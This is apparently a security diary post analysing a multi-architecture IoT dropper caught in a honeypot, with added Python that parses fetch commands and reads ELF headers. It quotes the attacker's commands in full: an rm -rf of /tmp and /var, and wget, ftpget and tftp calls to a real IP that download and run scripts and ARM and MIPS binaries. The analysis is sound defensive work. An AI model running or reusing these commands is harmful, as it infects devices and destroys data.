
More Multi-Architecture IoT Malware

Published: 2016-02-15. Last Updated: 2016-02-15 18:17:36 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Attackers have problems too: attacks against "Internet of Things" (IoT) devices are simple (as in "just log in"), but the attacker never knows in advance what kind of architecture they will hit. IoT devices often go beyond the standard x86 architecture we are used to on our servers and workstations. What I typically see is an attempt to launch multiple binaries, compiled for different architectures, to see "what runs".

For example, this was the "#1" malware in our honeypot today:

After logging in, the attacker runs the following commands (comments and line breaks added):

rm -rf /tmp/* /var/*;  # clean out /tmp... ouch. /var ? that can break stuff. 
cd /tmp || cd /var/;   # cd to /tmp or /var, whatever is available.

# download via http, ftp or tftp . whatever works
wget http://149.202.242.80/t.sh; sh t.sh;  
ftpget -u anonymous -p anonymous 149.202.242.80 tt.sh tt.sh;sh tt.sh;
tftp -r ttt.sh -g 149.202.242.80;sh ttt.sh
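The "whatever works" download chain above is a useful thing to pull apart automatically when you are sifting honeypot sessions. The following Python is an added example, not code from the diary: it splits a captured command line into its individual commands, extracts the host, protocol and remote file name from each busybox-style wget, ftpget or tftp invocation, and flags the pattern of one host being tried over several protocols. The sample command line is the one from this diary, re-joined as typed; the argument conventions for ftpget and tftp are assumed from the busybox usage text, and example.invalid in the usage note is a placeholder.

```python
import re
import shlex
from urllib.parse import urlparse

# The captured command line from this diary, re-joined as the attacker typed it
# (the author's added comments and line breaks removed).
SAMPLE_CMD = (
    "rm -rf /tmp/* /var/*; cd /tmp || cd /var/; "
    "wget http://149.202.242.80/t.sh; sh t.sh; "
    "ftpget -u anonymous -p anonymous 149.202.242.80 tt.sh tt.sh;sh tt.sh; "
    "tftp -r ttt.sh -g 149.202.242.80;sh ttt.sh"
)


def split_commands(line):
    """Split a one-liner on ';', '&&' and '||' (enough for dropper command lines)."""
    return [c.strip() for c in re.split(r";|&&|\|\|", line) if c.strip()]


def parse_fetch(argv):
    """Return (protocol, host, remote_file) for a busybox-style wget/ftpget/tftp
    command, or None for anything else. Argument conventions assumed here:
      wget URL
      ftpget [-u USER] [-p PASS] [-P PORT] HOST [LOCAL_FILE] REMOTE_FILE
      tftp [-g|-p] [-l LOCAL_FILE] [-r REMOTE_FILE] HOST [PORT]
    """
    if not argv:
        return None
    tool = argv[0]
    if tool == "wget":
        for arg in argv[1:]:
            if arg.startswith(("http://", "https://", "ftp://")):
                u = urlparse(arg)
                proto = "http" if u.scheme.startswith("http") else u.scheme
                return (proto, u.hostname, u.path.rsplit("/", 1)[-1])
        return None
    if tool == "ftpget":
        positional, i = [], 1
        while i < len(argv):
            if argv[i] in ("-u", "-p", "-P"):
                i += 2  # option that takes a value
            else:
                positional.append(argv[i])
                i += 1
        return ("ftp", positional[0], positional[-1]) if len(positional) >= 2 else None
    if tool == "tftp":
        remote, positional, i = None, [], 1
        while i < len(argv):
            if argv[i] in ("-l", "-r"):
                if argv[i] == "-r" and i + 1 < len(argv):
                    remote = argv[i + 1]
                i += 2
            elif argv[i].startswith("-"):
                i += 1  # flag without a value, e.g. -g
            else:
                positional.append(argv[i])
                i += 1
        return ("tftp", positional[0], remote) if positional and remote else None
    return None


def extract_iocs(line):
    """All (protocol, host, remote_file) fetches found in a captured command line."""
    iocs = []
    for cmd in split_commands(line):
        try:
            argv = shlex.split(cmd)
        except ValueError:  # unbalanced quotes in a garbled capture
            continue
        fetch = parse_fetch(argv)
        if fetch:
            iocs.append(fetch)
    return iocs


def is_multi_protocol_dropper(line):
    """True when one host is tried over two or more protocols (the 'whatever works'
    pattern above); a single wget of a script does not trigger it."""
    by_host = {}
    for proto, host, _ in extract_iocs(line):
        by_host.setdefault(host, set()).add(proto)
    return any(len(protos) >= 2 for protos in by_host.values())


if __name__ == "__main__":
    for ioc in extract_iocs(SAMPLE_CMD):
        print("%-5s %-16s %s" % ioc)
    print("multi-protocol dropper:", is_multi_protocol_dropper(SAMPLE_CMD))
```

Run against the diary's command line this yields three fetches, all from 149.202.242.80 over http, ftp and tftp, and the dropper heuristic fires; a benign-looking single `wget http://example.invalid/a.sh; sh a.sh` does not. The parser only recognises the three busybox fetchers seen here, so extend parse_fetch if your honeypot sees curl or nc-based variants.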

The downloaded script (here the wget version, t.sh) looks like this:

cp /bin/busybox ./;                                                                       # start from a local copy of busybox
wget http://149.202.242.80/arm;cat arm >busybox;rm -f arm; chmod 777 busybox;./busybox;   # overwrite it with the ARM build and try to run it
wget http://149.202.242.80/mips;cat mips >busybox;rm -f mips;./busybox;                   # then the MIPS (big endian) build
wget http://149.202.242.80/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox              # then the MIPS little endian build

So essentially, the local copy of "busybox" is overwritten in turn with each of the downloaded binaries, and each one is executed. In this case, an ARM, a MIPS (big endian) and a MIPS little endian ("mipsel") build are retrieved. A binary built for the wrong architecture simply fails to start (the kernel rejects it with "Exec format error"), so whichever one matches the device is the one that ends up running. Note that only the first attempt runs chmod 777; the later ones rely on the file keeping its mode when cat overwrites it in place.
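To find out which of the three downloads would actually run on a given device, an analyst can read the ELF header instead of executing anything, which is also the point the comment below makes about detecting the architecture rather than guessing. The following Python is an added example, not code from the diary or from the malware: the three sample headers are constructed inside the script (minimal ELF32 headers with the e_machine and endianness fields set the way real arm, mips and mipsel files would have them), and the host table is an assumption mapping a few platform.machine() strings to the ELF values a kernel of that type executes natively.

```python
import platform
import struct

# ELF e_machine constants (from the ELF specification / elf.h).
E_MACHINE = {
    0x03: "x86",
    0x08: "MIPS",
    0x28: "ARM",
    0x3E: "x86-64",
    0xB7: "AArch64",
}


def elf_arch(data):
    """Return (machine, endianness, bits) for an ELF image, or None if it is not ELF.

    Only the identification bytes and e_machine are read, so this is safe on
    hostile input: nothing is executed and nothing else is parsed.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(data[4])             # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        return None
    fmt = "<H" if endian == "little" else ">H"
    (e_machine,) = struct.unpack_from(fmt, data, 18)  # after e_ident (16) + e_type (2)
    return E_MACHINE.get(e_machine, "unknown(0x%x)" % e_machine), endian, bits


def make_elf32_header(e_machine, endian):
    """Constructed test data: a minimal 52-byte ELF32 EXEC header, not a real binary."""
    fmt = "<" if endian == "little" else ">"
    e_ident = b"\x7fELF" + bytes([1, 1 if endian == "little" else 2, 1, 0]) + b"\x00" * 8
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    return e_ident + struct.pack(fmt + "HHIIIIIHHHHHH",
                                 2, e_machine, 1, 0x400000, 52, 0, 0, 52, 32, 0, 40, 0, 0)


# Stand-ins for the three files the dropper fetches (constructed, see above).
SAMPLES = {
    "arm": make_elf32_header(0x28, "little"),
    "mips": make_elf32_header(0x08, "big"),
    "mipsel": make_elf32_header(0x08, "little"),
}

# Assumed mapping from platform.machine() strings to what that kernel executes natively.
# Compat layers (32-bit ARM on an AArch64 kernel) and ABI flags are deliberately ignored.
HOST_TABLE = {
    "x86_64": ("x86-64", "little"),
    "i686": ("x86", "little"),
    "armv6l": ("ARM", "little"),
    "armv7l": ("ARM", "little"),
    "aarch64": ("AArch64", "little"),
    "mips": ("MIPS", "big"),
    "mipsel": ("MIPS", "little"),
}


def triage(samples):
    """Map each sample name to its (machine, endianness, bits), or None for non-ELF data."""
    return {name: elf_arch(blob) for name, blob in samples.items()}


def runnable_here(samples, host_machine=None):
    """Names of the samples matching the host's native architecture and byte order.

    This is what the dropper discovers the hard way by executing each file in
    turn: the mismatched ones are rejected by the kernel with 'Exec format error'.
    """
    target = HOST_TABLE.get(host_machine or platform.machine())
    if target is None:
        return []
    return [name for name, blob in samples.items()
            if (info := elf_arch(blob)) is not None and info[:2] == target]


if __name__ == "__main__":
    for name, info in triage(SAMPLES).items():
        print("%-7s -> %s" % (name, info))
    print("would run on this host:", runnable_here(SAMPLES) or "none of them")
```

On an x86-64 analysis box none of the three samples matches, which is exactly why the dropper's "try them all" approach is harmless there and why a quick header check beats running unknown IoT binaries. The same elf_arch function works on real files read with open(path, "rb"); the mips and mipsel samples differ only in the EI_DATA byte, which is the whole difference between those two downloads.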

The "sad" part about this: these attackers appear to go to some length to compile these binaries for various platforms, but the binaries don't appear to do much at all, or are just broken. This is probably another indication of how simple it is to go after IoT devices.

FWIW: if you use a Raspberry Pi, make sure to change the default password! I am seeing a LOT of attempts to use the default credentials.

---
Johannes B. Ullrich, Ph.D.


Comments

Since the attacker has already logged in, why try to guess the right binary? It's easier to detect the architecture and OS...

-M.
